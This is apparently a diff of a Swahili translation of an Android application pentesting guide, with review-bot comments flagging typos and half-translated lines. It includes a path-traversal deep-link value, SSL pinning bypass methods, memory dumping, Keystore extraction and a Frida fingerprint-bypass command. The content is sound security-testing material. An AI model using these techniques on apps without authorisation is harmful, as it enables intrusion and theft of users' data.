Unaweza kutafuta deep links kwa mikono, ukitumia zana kama MobSF au scripts kama [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Unaweza **fungua** scheme iliyotangazwa kwa kutumia **adb** au **kivinjari**:
```bash
adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name]
```
_Kumbuka kwamba unaweza **kuacha jina la package** na simu itaitisha app itakayofungua link hiyo._
_Kumbuka kwamba unaweza **omit the package name** na kifaa cha mkononi kitaiteisha moja kwa moja app inayofaa kufungua link hiyo._
```html
<!-- Browser regular link -->
<a href="scheme://hostname/path?param=value">Click me</a>
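Review bot: the new Broadcast receiver line introduces the misspelling `vunerable` (`inaweza kuwa vunerable`); the old line and the rest of the file spell it `vulnerable`.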
 | 
			
		||||
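Review bot: the new Broadcast Receiver line spells the term "vunerable"; the rest of the page keeps it as the English word "vulnerable", so fix the typo. In the same hunk the new deep-link note ("_Kumbuka kwamba unaweza **omit the package name** na kifaa cha mkononi kitaiteisha ..._") leaves an English phrase inside an otherwise Swahili sentence, and "kitaiteisha" looks like a typo where the previous wording used "itaitisha"; translate the bold phrase as the old line did ("kuacha jina la package") and correct the verb.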
@ -400,45 +399,47 @@ Ili kupata **msimbo utakaoendeshwa katika App**, nenda kwenye activity inayoitwa

**Taarifa nyeti**

Kila unapopata deep link hakikisha kuwa **haipokei data nyeti (kama nywila) kupitia vigezo vya URL**, kwa sababu programu nyingine yoyote inaweza **kuiga deep link na kuiba data hiyo!**
Kila unapopata deep link hakikisha kwamba **haipokei data nyeti (kama passwords) kupitia vigezo vya URL**, kwa sababu programu nyingine yoyote inaweza **kuiga deep link na kuiba data hiyo!**

**Parameters in path**
**Vigezo katika path**

Unapaswa pia kukagua kama deep link yoyote inatumia parameter ndani ya path ya URL kama: `https://api.example.com/v1/users/{username}` , katika kesi hiyo unaweza kulazimisha path traversal kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Kumbuka kwamba ukigundua endpoints sahihi ndani ya application unaweza kusababisha **Open Redirect** (ikiwa sehemu ya path inatumiwa kama domain name), **account takeover** (ikiwa unaweza kubadilisha maelezo ya users bila CSRF token na endpoint iliyo na udhaifu ilitumia method sahihi) na udhaifu mwingine wowote. Taarifa zaidi kuhusu hili [hapa](http://dphoeniixx.com/2020/12/13-2/).
Unapaswa **pia kukagua ikiwa deep link yoyote inatumia parameter ndani ya path** ya URL kama: `https://api.example.com/v1/users/{username}`, katika kesi hiyo unaweza kulazimisha path traversal kwa kuingia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value`.\
Kumbuka kwamba ukipata endpoints sahihi ndani ya application unaweza kusababisha **Open Redirect** (ikiwa sehemu ya path inatumika kama domain name), **account takeover** (ikiwa unaweza kubadilisha maelezo ya users bila CSRF token na endpoint dhaifu ilitumia method sahihi) na aina nyingine yoyote ya vuln. Maelezo zaidi [hapa](http://dphoeniixx.com/2020/12/13-2/).

Mrejeleo wa [ripoti ya bug bounty ya kuvutia](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
**More examples**

### Uchunguzi wa Tabaka la Usafirishaji na Makosa ya Uthibitishaji
Ripoti ya [bug bounty ya kuvutia](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).

- **Certificates hazikaguliwi kila wakati ipasavyo** na applications za Android. Ni kawaida kwa applications hizi kupuuzia onyo na kukubali self-signed certificates au, katika matukio mengine, kurudi kutumia HTTP connections.
- **Mazungumzo wakati wa SSL/TLS handshake wakati mwingine ni dhaifu**, yakitumia insecure cipher suites. Udhaifu huu unafanya connection kuwa nyeti kwa man-in-the-middle (MITM) attacks, kuruhusu washambuliaji kuvunja usimbaji na kufikia data.
- **Leakage of private information** ni hatari wakati applications zinathibitisha kwa kutumia secure channels kisha kuwasiliana kwa non-secure channels kwa shughuli nyingine. Mbinu hii inashindwa kulinda data nyeti, kama session cookies au user details, dhidi ya interception na entities zenye nia mbaya.
### Ukaguzi wa Transport Layer na Kushindwa kwa Uthibitishaji

- **Certificates hazichunguzwi kila mara ipasavyo** na applications za Android. Ni kawaida kwa applications hizi kupuuza onyo na kukubali self-signed certificates au, katika baadhi ya matukio, kurudi kutumia HTTP connections.
- **Mazungumzo wakati wa SSL/TLS handshake wakati mwingine ni dhaifu**, yakitumia insecure cipher suites. Uraha huo unafanya koneksheni kuwa nyeti kwa man-in-the-middle (MITM) attacks, na kuruhusu watakanya ku-decrypt data.
- **Leakage of private information** ni hatari wakati applications zina-authenticate kwa kutumia secure channels lakini kisha kuwasiliana kwa channels zisizo-secure kwa miamala mingine. Njia hii hairuhusu ulinzi wa data nyeti, kama session cookies au user details, dhidi ya interception na wahalifu.

#### Certificate Verification

Tutazingatia **certificate verification**. Uadilifu wa server's certificate ni lazima uthibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu misanidi isiyo salama ya TLS na uhamishaji wa data nyeti kupitia channels zisizosimbwa vinaweza kusababisha hatari kubwa. Kwa hatua za kina za kuthibitisha server certificates na kushughulikia udhaifu, [**this resource**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo kamili.
Tutazingatia **certificate verification**. Uadilifu wa server's certificate lazima uathibitishwe ili kuboresha usalama. Hii ni muhimu kwa sababu misanidi ya TLS isiyo salama na upeleka wa data nyeti kupitia channels zisizo-encrypted vinaweza kusababisha hatari kubwa. Kwa hatua za kina juu ya kuthibitisha server certificates na kushughulikia vulnerabilities, rasilimali hii [**this resource**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo kamili.

#### SSL Pinning

SSL Pinning ni kifaa cha usalama ambapo application inathibitisha server's certificate dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Njia hii ni muhimu kuzuia MITM attacks. Kutekeleza SSL Pinning kunashauriwa kwa nguvu kwa applications zinazoshughulikia taarifa nyeti.
SSL Pinning ni hatua ya usalama ambapo application inathibitisha server's certificate dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Mbinu hii ni muhimu kuzuia MITM attacks. Kutekeleza SSL Pinning kunapendekezwa kwa nguvu kwa applications zinazoshughulikia taarifa nyeti.

#### Traffic Inspection

Ili kuchunguza HTTP traffic, ni muhimu **kusakinisha certificate ya proxy tool** (mfano, Burp). Bila kusakinisha certificate hii, traffic iliyosimbwa inaweza isionekane kupitia proxy. Kwa mwongozo wa kusakinisha custom CA certificate, [**bonyeza hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Ili kuchunguza HTTP traffic, ni muhimu **kufunga certificate ya proxy tool** (km: Burp). Bila kufunga certificate hii, traffic iliyosimbwa huenda ikasionelezeka kupitia proxy. Kwa mwongozo wa jinsi ya kufunga custom CA certificate, [**click here**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).

Applications zinazolenga **API Level 24 and above** zinahitaji marekebisho ya Network Security Config ili kukubali proxy's CA certificate. Hatua hii ni muhimu kwa kuchunguza traffic iliyosimbwa. Kwa maelekezo ya kubadilisha Network Security Config, [**refer to this tutorial**](make-apk-accept-ca-certificate.md).
Applications zinazolenga **API Level 24 and above** zinahitaji mabadiliko kwenye Network Security Config ili kukubali proxy's CA certificate. Hatua hii ni muhimu kwa kuchunguza traffic iliyosimbwa. Kwa maelekezo ya kubadilisha Network Security Config, [**refer to this tutorial**](make-apk-accept-ca-certificate.md).

Ikiwa **Flutter** inatumika lazima ufuate maelekezo kwenye [**this page**](flutter.md). Hii ni kwa sababu, kuingiza certificate tu kwenye store haitafanya kazi kwani Flutter ina orodha yake ya CA halali.
Ikiwa **Flutter** inatumika, lazima ufuate maelekezo katika [**this page**](flutter.md). Hii ni kwa sababu, kuongeza tu certificate kwenye store haitafanya kazi kwani Flutter ina orodha yake ya CA zinazokubalika.

#### Static detection of SSL/TLS pinning

Kabla ya kujaribu runtime bypasses, chora haraka mahali pinning inatekelezwa ndani ya APK. Ugunduzi wa static utakusaidia kupanga hooks/patches na kuzingatia njia sahihi za msimbo.
Kabla ya kujaribu runtime bypasses, panga haraka mahali pinning inatekelezwa ndani ya APK. Ugunduzi wa static utakusaidia kupanga hooks/patches na kuzingatia code paths sahihi.

Tool: SSLPinDetect
- Open-source static-analysis utility ambayo inadecompile APK hadi Smali (kwa apktool) na inascan kwa curated regex patterns za implementations za SSL/TLS pinning.
- Inaripoti path kamili ya faili, nambari ya mstari, na kipande cha msimbo kwa kila match.
- Inashughulikia frameworks zinazotumika na code paths maalum: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, and Network Security Config XML pins.
- Open-source static-analysis utility that decompiles the APK to Smali (via apktool) and scans for curated regex patterns of SSL/TLS pinning implementations.
- Reports exact file path, line number, and a code snippet for each match.
- Covers common frameworks and custom code paths: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, and Network Security Config XML pins.

Install
- Prereqs: Python >= 3.8, Java on PATH, apktool
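Review bot: the new SSL/TLS handshake bullet contains two broken words, "Uraha huo" and "watakanya", where the old line read "Udhaifu huu" and "washambuliaji"; as written the sentence no longer says who is able to decrypt the traffic. In the new Traffic Inspection paragraph "ikasionelezeka" is likewise not a word (old line: "isionekane"), and in the Certificate Verification paragraph "rasilimali hii [**this resource**]" now states the noun twice. Separately, the three SSLPinDetect bullets go from Swahili back to English in this hunk, the opposite direction to the rest of the commit; if that is intentional (keeping the tool's own description verbatim), say so in the commit message, otherwise it is a regression.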
@ -455,8 +456,8 @@ python sslpindetect.py -f app.apk -a apktool.jar
# Verbose (timings + per-match path:line + snippet)
python sslpindetect.py -a apktool_2.11.0.jar -f sample/app-release.apk -v
```
Mfano wa kanuni za pattern (JSON)
Tumia au ongeza signatures ili kugundua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na scan at scale.
Mifano ya kanuni za pattern (JSON)
Tumia au ongeza signatures ili kugundua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na kufanya scan kwa kiwango kikubwa.
```json
{
"OkHttp Certificate Pinning": [
@ -471,20 +472,20 @@ Tumia au ongeza signatures ili kugundua proprietary/custom pinning styles. Unawe
}
```
Notes and tips
- Fast scanning on large apps via multi-threading and memory-mapped I/O; pre-compiled regex reduces overhead/false positives.
- Skanning ya haraka kwenye apps kubwa kwa kutumia multi-threading na memory-mapped I/O; regex zilizotanguliwa hupunguza mzigo/false positives.
- Pattern collection: https://github.com/aancw/smali-sslpin-patterns
- Typical detection targets to triage next:
- OkHttp: matumizi ya CertificatePinner, setCertificatePinner, marejeo ya package okhttp3/okhttp
- TrustManagers maalum: javax.net.ssl.X509TrustManager, overrides za checkServerTrusted
- SSL contexts maalum: SSLContext.getInstance + SSLContext.init na managers maalum
- Declarative pins katika res/xml network security config na marejeo kwenye manifest
- Tumia maeneo yaliyoendana kupanga Frida hooks, static patches, au mapitio ya config kabla ya dynamic testing.
- Lengo za kawaida za kugundua za kutathmini kisha:
- OkHttp: CertificatePinner usage, setCertificatePinner, okhttp3/okhttp package references
- Custom TrustManagers: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
- Custom SSL contexts: SSLContext.getInstance + SSLContext.init with custom managers
- Declarative pins in res/xml network security config and manifest references
- Tumia maeneo yaliyolingana kupanga Frida hooks, static patches, au ukaguzi wa config kabla ya majaribio ya dynamic.



#### Kuvuka SSL Pinning
#### Bypassing SSL Pinning

When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS traffic. Various methods are available for this purpose:
When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS traffic. Mbinu mbalimbali zinapatikana kwa madhumuni haya:

- Automatically **modify** the **apk** to **bypass** SSLPinning with [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). The best pro of this option, is that you won't need root to bypass the SSL Pinning, but you will need to delete the application and reinstall the new one, and this won't always work.
- You could use **Frida** (discussed below) to bypass this protection. Here you have a guide to use Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
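Review bot: the translation direction is inconsistent within this hunk: the "Fast scanning" bullet goes from English to Swahili while the "Typical detection targets" sub-bullets go from Swahili to English, so the list under "Notes and tips" now switches language line by line. The new SSL Pinning bypass intro is also only half translated ("When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS traffic. Mbinu mbalimbali zinapatikana kwa madhumuni haya:"); either translate the first sentence as well or keep the whole paragraph in English.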
@ -494,13 +495,13 @@ When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS

#### Looking for Common Web Vulnerabilities

Ni muhimu pia kutafuta udhaifu wa kawaida wa wavuti ndani ya application. Maelezo ya kina juu ya utambuzi na kupunguza udhaifu huu yapo nje ya muhtasari huu lakini yameelezewa kwa kina mahali pengine.
Ni muhimu pia kutafuta udhaifu wa kawaida wa web ndani ya application. Maelezo ya kina juu ya kutambua na kupunguza udhaifu haya yapo mahali pengine na hayajumuishwi hapa.

### Frida

[Frida](https://www.frida.re) is a dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.\
**You can access running application and hook methods on run time to change the behaviour, change values, extract values, run different code...**\
If you want to pentest Android applications you need to know how to use Frida.
[Frida](https://www.frida.re) ni dynamic instrumentation toolkit kwa developers, reverse-engineers, na watafiti wa usalama.\
**Unaweza kufikia application inayokimbia na kuhook methods wakati wa run time ili kubadilisha tabia, kubadilisha thamani, kutoa thamani, kuendesha code tofauti...**\
Kama unataka pentest Android applications unahitaji kujua jinsi ya kutumia Frida.

- Learn how to use Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Some "GUI" for actions with Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
@ -516,7 +517,7 @@ android-anti-instrumentation-and-ssl-pinning-bypass.md

### **Dump Memory - Fridump**

Angalia kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi kama passwords au mnemonics.
Kagua kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi, kama passwords au mnemonics.

Using [**Fridump3**](https://github.com/rootbsd/fridump3) you can dump the memory of the app with:
```bash
@ -527,63 +528,63 @@ python3 fridump3.py -u <PID>
frida-ps -Uai
python3 fridump3.py -u "<Name>"
```
Hii itadump kumbukumbu katika folda ./dump, na huko unaweza kutumia grep kwa kitu kama:
Hii itadump memory kwenye folda ./dump, na hapo unaweza grep kwa kitu kama:
```bash
strings * | grep -E "^[a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+$"
```
### **Data nyeti katika Keystore**

Katika Android Keystore ni mahali bora pa kuhifadhi data nyeti, hata hivyo, kwa idhini za kutosha bado ni **inawezekana kuifikia**. Kwa kuwa programu zinaelekea kuhifadhi hapa **data nyeti kwa maandishi wazi**, pentests zinapaswa kuikagua kwa root user au mtu mwenye ufikiaji wa kimwili wa kifaa ambaye anaweza kuiba data hii.
Katika Android, Keystore ni mahali bora pa kuhifadhi data nyeti, hata hivyo, kwa ruhusa za kutosha bado ni **inawezekana kuifikia**. Kwa kuwa applications huwa zinaweka hapa **sensitive data in clear text**, pentests zinapaswa kukagua hili kwa kutumia root user, kwani mtu mwenye ufikiaji wa kimwili kwa kifaa anaweza kuiba data hii.

Hata kama app ilihifadhi data katika keystore, data inapaswa kusimbwa.
Hata kama app iliweka data katika Keystore, data inapaswa kusimbwa.

Ili kufikia data ndani ya keystore unaweza kutumia Frida script hii: https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js
Ili kufikia data ndani ya keystore unaweza kutumia Frida script: [https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js](https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js)
```bash
frida -U -f com.example.app -l frida-scripts/tracer-cipher.js
```
### **Fingerprint/Biometrics Bypass**

Kutumia Frida script ifuatayo, inaweza kuwa inawezekana **bypass fingerprint authentication** ambayo programu za Android zinaweza kufanya ili **kulinda maeneo fulani nyeti:**
Kutumia script ifuatayo ya Frida kunaweza kumwezesha **bypass fingerprint authentication** ambayo Android applications zinaweza kutumia ili **kulinda maeneo fulani nyeti:**
```bash
frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f <app.package>
```
### **Picha za Mandharinyuma**
### **Picha za Usuli**

Unapoweka programu kwenye mandharinyuma, Android huhifadhi **snapshot ya programu**, hivyo inaporejeshwa kwenye foreground inaanza kupakia picha kabla ya programu ili ionekane kama ilipakuliwa haraka.
Unapoweka programu kwenye usuli, Android huhifadhi **snapshot ya programu** ili inaporekebishwa kurudi kwenye mbele (foreground) inaanza kupakia picha kabla ya programu, hivyo inaonekana kama programu ilipakiwa kwa haraka.

Hata hivyo, ikiwa snapshot hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa snapshot anaweza **kuiba hizo taarifa** (kumbuka kwamba unahitaji root ili kuzifikia).
Hata hivyo, ikiwa snapshot hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa snapshot anaweza **kuiba taarifa hiyo** (kumbuka unahitaji root ili kuifikia).

Snapshots kawaida huhifadhiwa karibu: **`/data/system_ce/0/snapshots`**
Snapshots hizi kwa kawaida huhifadhiwa hapa: **`/data/system_ce/0/snapshots`**

Android inatoa njia ya **kuzuia kuchukuliwa kwa screenshot kwa kuweka parameter ya layout FLAG_SECURE**. Kwa kutumia flag hii, yaliyomo kwenye dirisha yanachukuliwa kuwa salama, na hivyo kuzuia kuonekana kwenye screenshots au kutazamwa kwenye displays zisizo-salama.
Android inatoa njia ya **kuzuia kunyakuliwa picha za skrini kwa kuweka parametro ya layout FLAG_SECURE**. Kwa kutumia flag hii, yaliyomo kwenye dirisha yanachukuliwa kuwa salama, na kuzuia kuonekana kwenye picha za skrini au kuonyeshwa kwenye skrini zisizo salama.
```bash
getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
```
### **Android Application Analyzer**
### **Mchambuzi wa Programu za Android**

Zana hii inaweza kukusaidia kusimamia zana tofauti wakati wa uchambuzi wa kimitambo (dynamic analysis): [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
Zana hii inaweza kukusaidia kusimamia zana tofauti wakati wa dynamic analysis: [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)

### Intent Injection

Waundaji mara nyingi huunda komponenti za proxy kama activities, services, na broadcast receivers ambazo hushughulikia Intent hizi na kuzipitisha kwa njia kama `startActivity(...)` au `sendBroadcast(...)`, jambo ambalo linaweza kuwa hatari.
Waendelezaji mara nyingi huunda proxy components kama activities, services, na broadcast receivers ambazo zinashughulikia Intent hizi na kuzipeleka kwa methods kama `startActivity(...)` au `sendBroadcast(...)`, ambazo zinaweza kuwa hatarishi.

Hatari iko katika kuruhusu wadukuzi kuchochea non-exported app components au kupata sensitive content providers kwa kuelekeza vibaya Intent hizi. Mfano wa kuzingatia ni `WebView` kubadilisha URLs kuwa vitu vya `Intent` kupitia `Intent.parseUri(...)` na kisha kuvitekeleza, jambo ambalo linaweza kusababisha malicious Intent injections.
Hatari iko katika kuruhusu washambuliaji kuanzisha components za app zisizokuwa exported au kupata content providers nyeti kwa kubeleza Intent hizi. Mfano unaojulikana ni component ya `WebView` kubadilisha URLs kuwa vitu vya `Intent` kupitia `Intent.parseUri(...)` kisha kuvitekeleza, jambo ambalo linaweza kusababisha intent zenye madhara.

### Hitimisho Muhimu
### Essential Takeaways

- **Intent Injection** ni sawa na tatizo la Open Redirect kwenye web.
- Udanganyifu unaohusisha kupitisha vitu vya `Intent` kama extras, ambavyo vinaweza kuelekezwa tena ili kutekeleza operesheni zisizo salama.
- Inaweza kufunua non-exported components na content providers kwa wadukuzi.
- U-badilishaji wa URL kuwa `Intent` katika `WebView` unaweza kuwezesha vitendo visivyokusudiwa.
- **Intent Injection** ni sawa na tatizo la Open Redirect la web.
- Maenendo yanahusisha kupitisha `Intent` objects kama extras, ambayo yanaweza kuelekezwa tena ili kutekeleza operesheni zisizo salama.
- Inaweza kufichua components zisizokuwa exported na content providers kwa washambuliaji.
- Ubadilishaji wa URL kuwa `Intent` katika `WebView` unaweza kurahisisha vitendo visivyokusudiwa.

### Android Client Side Injections and others

Huenda tayari unafahamu aina hizi za udhaifu kutoka kwenye Web. Lazima kuwa mwangalifu sana na udhaifu hivi katika programu ya Android:
Huenda unajua kuhusu aina hizi za vulnerabilities kutoka kwa Web. Lazima uwe mwangalifu hasa na vulnerabilities hizi katika application ya Android:

- **SQL Injection:** Wakati wa kushughulikia queries zinazobadilika au Content-Providers, hakikisha unatumia parameterized queries.
- **JavaScript Injection (XSS):** Hakikisha JavaScript na Plugin support imezimwa kwa WebViews yoyote (imezimwa kwa default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews zinafaa kuzuia access to the file system (imewezeshwa kwa default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: Katika kesi kadhaa programu ya android inapomaliza session cookie haifutwi au inaweza hata kuhifadhiwa kwenye disk
- **SQL Injection:** Unaposhughulika na dynamic queries au Content-Providers hakikisha unatumia parameterized queries.
- **JavaScript Injection (XSS):** Thibitisha kwamba support ya JavaScript na Plugin imezimwa kwa WebViews zote (imezimwa kwa default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews zinapaswa kuwa na ufikiaji wa file system uzimw (umewezeshwa kwa default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: Katika kesi kadhaa, wakati application ya Android inapo maliza session cookie haifutwi au inaweza hata kuhifadhiwa kwenye disk
- [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/index.html#cookies-flags)

---
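Review bot: the new Keystore paragraph changes what the old one said: the old line had pentests check the Keystore as the root user or as someone with physical access to the device, while the new line says to check as root because someone with physical access could steal the data, which is a different claim; confirm this is an intended correction rather than a translation slip. Two typos in the new client-side injection bullets: "uzimw" in the Local File Inclusion line is a cut-off verb (the old line read "kuzuia access to the file system"), and "inapo maliza" in the Eternal cookies line should be one word, "inapomaliza". Pre-existing in both versions but visible in the hunk: the FLAG_SECURE snippet (`getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);`) is Java, yet its fence is tagged bash.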
@ -596,7 +597,7 @@ Huenda tayari unafahamu aina hizi za udhaifu kutoka kwenye Web. Lazima kuwa mwan

.png>)

**Vulnerability assessment of the application** using a nice web-based frontend. You can also perform dynamic analysis (but you need to prepare the environment).
**Tathmini ya udhaifu ya application** ikitumia frontend nzuri inayotegemea web. Unaweza pia kufanya dynamic analysis (lakini unahitaji kuandaa mazingira).
```bash
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
@ -604,43 +605,43 @@ docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
 | 
			
		||||
Notice that MobSF can analyse **Android**(apk)**, IOS**(ipa) **and Windows**(apx) applications (_Windows applications must be analyzed from a MobSF installed in a Windows host_).\
 | 
			
		||||
Also, if you create a **ZIP** file with the source code if an **Android** or an **IOS** app (go to the root folder of the application, select everything and create a ZIPfile), it will be able to analyse it also.
 | 
			
		||||
 | 
			
		||||
MobSF pia inakuwezesha kufanya **diff/Compare** analysis na kuunganishwa na **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuifungua: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, basi **hash** itakuwa **upload** badala ya faili.
 | 
			
		||||
MobSF pia inaruhusu kufanya **diff/Compare** ya analysis na kuunganisha **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuiwezesha: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, basi the **hash** itakuwa **upload** badala ya faili.
 | 
			
		||||
 | 
			
		||||
### Assisted Dynamic analysis with MobSF
 | 
			
		||||
### Uchambuzi wa Dynamic uliosaidiwa na MobSF
 | 
			
		||||
 | 
			
		||||
**MobSF** pia inaweza kuwa msaada mkubwa kwa ajili ya **dynamic analysis** kwenye **Android**, lakini katika kesi hiyo utahitaji kusanidi MobSF na **genymotion** kwenye host yako (VM au Docker hazitafanyi kazi). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
 | 
			
		||||
**MobSF** inaweza pia kuwa msaada mkubwa kwa ajili ya **dynamic analysis** katika **Android**, lakini katika kesi hiyo utahitaji kusanidi MobSF na **genymotion** kwenye host yako (VM au Docker hazitafanya kazi). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
 | 
			
		||||
The **MobSF dynamic analyser** inaweza:
 | 
			
		||||
 | 
			
		||||
- **Dump application data** (URLs, logs, clipboard, screenshots made by you, screenshots made by "**Exported Activity Tester**", emails, SQLite databases, XML files, and other created files). Yote haya hufanyika kiotomatiki isipokuwa kwa screenshots; unahitaji ku-bonyeza unapohitaji screenshot au unahitaji ku-bonyeza "**Exported Activity Tester**" ili kupata screenshots za activities zote zilizoexportiwa.
 | 
			
		||||
- **Dump application data** (URLs, logs, clipboard, screenshots made by you, screenshots made by "**Exported Activity Tester**", emails, SQLite databases, XML files, and other created files). Yote haya hufanywa kwa otomatiki isipokuwa kwa screenshots, unahitaji kubofya unapotaka screenshot au unahitaji kubofya "**Exported Activity Tester**" kupata screenshots za exported activities zote.
 | 
			
		||||
- Capture **HTTPS traffic**
 | 
			
		||||
- Use **Frida** to obtain **runtime** **information**
 | 
			
		||||
 | 
			
		||||
Kuanzia android **versions > 5**, itaanzisha **Frida** kiotomatiki na itaweka mipangilio ya **proxy** ya global ili **capture** traffic. Itachukua tu traffic kutoka kwa application inayochambuliwa.
 | 
			
		||||
Kuanzia android **versions > 5**, itaanza **Frida** kwa **automatic** na itaweka global **proxy** settings ili **capture** trafiki. Itakamata trafiki tu kutoka kwa application inayojaribiwa.
 | 
			
		||||
 | 
			
		||||
**Frida**
 | 
			
		||||
 | 
			
		||||
By default, it will also use some Frida Scripts to **bypass SSL pinning**, **root detection** and **debugger detection** and to **monitor interesting APIs**.\
 | 
			
		||||
MobSF pia inaweza **invoke exported activities**, grab **screenshots** of them and **save** them for the report.
 | 
			
		||||
Kwa default, itatumia pia baadhi ya Frida Scripts ili **bypass SSL pinning**, **root detection** na **debugger detection** na pia **monitor interesting APIs**.\
 | 
			
		||||
MobSF pia inaweza **invoke exported activities**, kuchukua **screenshots** za hizo activities na **save** kwa ajili ya report.
 | 
			
		||||
 | 
			
		||||
To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values (this will appear after pressing "Start Instrumentation").\
 | 
			
		||||
MobSF pia inakuwezesha kupakia **Frida scripts** zako mwenyewe (kama utatumia function `send()` kutuma matokeo ya Frida scripts zako kwa MobSF). Pia ina **several pre-written scripts** unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu, bonyeza "**Load**" na bonyeza "**Start Instrumentation**" (utaweza kuona logs za script hizo ndani ya "**Frida Live Logs**").
 | 
			
		||||
Ili kuanza dynamic testing bonyeza kitufe kijani: "**Start Instrumentation**". Bonyeza "**Frida Live Logs**" ili kuona logs zinazozalishwa na Frida scripts na "**Live API Monitor**" kuona mikao yote ya invocation kwa hooked methods, arguments zilizopita na values zilizorejeshwa (hii itaonekana baada ya kubofya "Start Instrumentation").\
 | 
			
		||||
MobSF pia inakuwezesha kupakia **Frida scripts** zako mwenyewe (to send the results of your Friday scripts to MobSF use the function `send()`). Ina pia **several pre-written scripts** unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu, bonyeza "**Load**" na kisha bonyeza "**Start Instrumentation**" (utaweza kuona logs za scripts hizo ndani ya "**Frida Live Logs**").
 | 
			
		||||
 | 
			
		||||
.png>)
 | 
			
		||||
 | 
			
		||||
Zaidi ya hayo, una baadhi ya Auxiliary Frida functionalities:
 | 
			
		||||
Zaidi ya hayo, una baadhi ya functionalities za ziada za Frida:
 | 
			
		||||
 | 
			
		||||
- **Enumerate Loaded Classes**: It will print all the loaded classes
 | 
			
		||||
- **Capture Strings**: It will print all the capture strings while using the application (super noisy)
 | 
			
		||||
- **Capture String Comparisons**: Could be very useful. It will **show the 2 strings being compared** and if the result was True or False.
 | 
			
		||||
- **Enumerate Class Methods**: Put the class name (like "java.io.File") and it will print all the methods of the class.
- **Search Class Pattern**: Search classes by pattern
- **Trace Class Methods**: **Trace** a **whole class** (see inputs and outputs of all methods of th class). Remember that by default MobSF traces several interesting Android Api methods.
- **Enumerate Loaded Classes**: Itaonyesha madarasa yote yaliyo loaded
- **Capture Strings**: Itaonyesha strings zote zinazokamatwa wakati wa kutumia application (inazalisha kelele nyingi)
